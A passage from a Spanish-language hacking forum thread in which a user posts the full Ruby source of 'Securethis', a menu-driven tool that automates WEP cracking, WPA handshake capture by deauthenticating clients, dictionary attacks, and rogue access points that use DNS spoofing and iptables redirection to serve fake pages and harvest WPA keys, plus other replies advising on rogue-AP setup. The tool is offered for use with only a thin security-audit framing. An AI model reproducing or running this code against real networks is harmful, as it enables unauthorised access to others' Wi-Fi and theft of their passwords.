« Respuesta #21 en: Marzo 22, 2013, 13:21:35 pm »
Hola a todos  ;)

Y Gracias a Kcdtv por la chincheta tambien  :)


@kiabras

1- Tiennes que mirar bien como se hace la configuracion del servidor DHCP.

Por ejemplo si el DHCP que usas anda y que el pc que se ha puesto en la red tienne una limitation de red y que ve une pahina blanca 404, es un problemo de DNS o de configuracion de at0 (ver IPTABLE en el script).Tiennes que areglar las réglas de IPTABLE del script con tu DHCP, los dos tiennen que estar igual para que todo anda bien.

2- No comprendo bien tu problemo con el essid, puedes hacer un screenshoot?

@kayakista

Hay muchos script en todo internet por hacer rogue AP ahora, pienso que hasta hora es la mejor forma de tener un llave WPA ;).Reaver WPS esta bueno pero no es une solucion magica tambien :)






Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #22 en: Abril 11, 2013, 22:37:17 pm »
Hola  :)

Me estoy aburriendo esta tarde, he re escribido el codigo.

Primero el install.rb

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

puts "this script will install the dependancies needed for Securethis, just be carreful on the shell ask Y for yes and n for no, the time of the installation depend to your connection speed and the engine of your computer, you can change the time between any installation using nano, gedit or mousepad when you see a sleep line into the script..."
sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
      sleep 60
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
      sleep 90
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
      sleep 150
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
`sudo a2enmod php5`
`sudo service apache2 restart`
`sudo gem install --no-rdoc --no-ri highline`

Segundo el script "Securethis.rb":

Código: [Seleccionar]
#!/usr/bin/env ruby
# encoding: utf-8

require "rubygems"
require "highline/import"

puts "Make a good choice with airodump and press ctrl+c for next step"
sleep 10
system ("airmon-ng start wlan0")
sleep 5
system ("airodump-ng mon0")

def wepinj
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wepp
system ("ifconfig")
      puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
mac=""
mac=gets.chomp
$mac=mac

puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wep mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 5
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
sleep 1800
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
end

def wpadico
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez un nom pour le fichier de capture"
nom=""
nom=gets.chomp
$nom=nom

     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
station=""
station=gets.chomp
$station=station


system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
sleep 148
puts "Entrez le nom du dico a utiliser"
dico=""
dico=gets.chomp
$dico=dico

system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
end

def wparlocal
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
`iptables -P FORWARD ACCEPT`
`iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
     puts "lancement de wireshark"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def wparinternet
  puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5
system ("airodump-ng --encrypt wpa mon0")
     puts "Rentrez le nom du reseau (ESSID)"
essid=""
essid=gets.chomp
$essid=essid

     puts "Rentrez le canal du reseau (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Rentrez l'adresse du reseau (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

     puts "Creation de la rogue AP"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
sleep 3
`ifconfig at0 up`
`ifconfig at0 10.0.0.1 netmask 255.255.255.0`
`ifconfig at0 mtu 1400`
`echo > dhcpd.leases`
`iptables --flush`
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --table nat --delete-chain`
`iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
     puts "Regles iptables effectues, redemarrage de dhcp3"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
     puts "Mise en place de apache et dnsspoof"
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
sleep 3
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
end

def hostapd
  puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
end

def deauth
  system ("ifconfig")
  puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
carte=""
carte=gets.chomp
$carte=carte

system ("airmon-ng start #{$carte}")
sleep 6
system ("airodump-ng --encrypt wpa mon0")
puts("enter the channel of the target network (CH)")
canal=""
canal=gets.chomp
$canal=canal

puts("enter the adress of the target network (BSSID)")
bssid=""
bssid=gets.chomp
$bssid=bssid

puts("enter the name of the file capture in airodump")
name=""
name=gets.chomp
$name=name

system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
sleep 5
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
end

def planque
  puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
sleep 15
system("airodump-ng --encrypt wpa mon0")
puts "Select the channel of the target network (CH)"
ch=""
ch=gets.chomp
$ch=ch

     puts "Select the bssid of the target network (BSSID)"
bssid=""
bssid=gets.chomp
$bssid=bssid

system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")

     puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
sleep 10
system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
end

def metasploit
    puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
sleep 20
system("msfconsole")
end

def clean
    puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
sleep 20
`rm /var/www/index.php`
`rm /var/www/index.html`
`rm /var/www/valid.php`
`rm /var/www/*.css`
`rm /var/www/*.jpg`
`rm /var/www/*.ico`

puts "Now enter the name of your folder wich countain the fakes pages"
name=""
name=gets.chomp
$name=name

Dir.chdir '/root'
`cp -rv #{$name} /var/www`
end

def settings
  puts "CHECK and EDIT: Important file needed for a good crack"
sleep 10
`gedit /etc/dhcp3/dhcpd.conf`
`gedit /root/dns.txt`
`gedit /etc/hostapd/hostapd.conf`
`gedit /var/log/apache2/access.log`
`gedit /var/log/apache2/error.log`
end

begin
  puts
  loop do
    choose do |menu|
      menu.prompt = "Please select option"
  puts "##################    Coded By Flow (Koala)              #################"
  puts "##################    Securethis V1.1                    #################"
  puts "                  #########################                   "
  puts "                        #############                         "
  puts "                            #####                             "
  puts "                              #                               "
  puts "~~~Does your network is secure?~~~                            "
 
      menu.choice(:Wepinjection, "injection.") { wepinj() }
      menu.choice(:Wepp0841, "-p0841.") { wepp() }
      menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
      menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
      menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
      menu.choice(:Hostapd, "Hostapd.") { hostapd() }   
      menu.choice(:DeauthAttack, "airdrop-ng.") { deauth() }
      menu.choice(:HiddenNetwork, "reseau caché.") { planque() }
      menu.choice(:Metasploit, "lancement de msfconsole.") { metasploit() }
      menu.choice(:CleanApache2WARNING, "supprime les fichier du crack.") { clean() }
      menu.choice(:Settings, "Boite a outils.") { settings() }
      menu.choice(:Quit, "Quitter le prog.") { exit }
    end
  end
end



Que disfrutais ;)
« Última modificación: Abril 15, 2013, 17:59:48 pm por koala63 »

kcdtv

  • Visitante
Re:Securethis V1.0
« Respuesta #23 en: Abril 11, 2013, 22:54:54 pm »
Tengo un par de cosas más por si te aburres koala  ;D
Gracias compi  ;)

.... esta en franglish  ;D

Código: [Seleccionar]
puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
sleep 5

Código: [Seleccionar]
puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
Si quieres dejare una traducción al español  ;)
« Última modificación: Abril 11, 2013, 23:01:49 pm por kcdtv »

Desconectado koala63

  • Usuario
  • *
  • Mensajes: 126
Re:Securethis V1.0
« Respuesta #24 en: Abril 11, 2013, 23:09:48 pm »
Citar
esta en franglish

Nuevo language  :D

Si puedes hacer la traduccion me encatare por que no soy espanol y no sé hablar muy bien ;)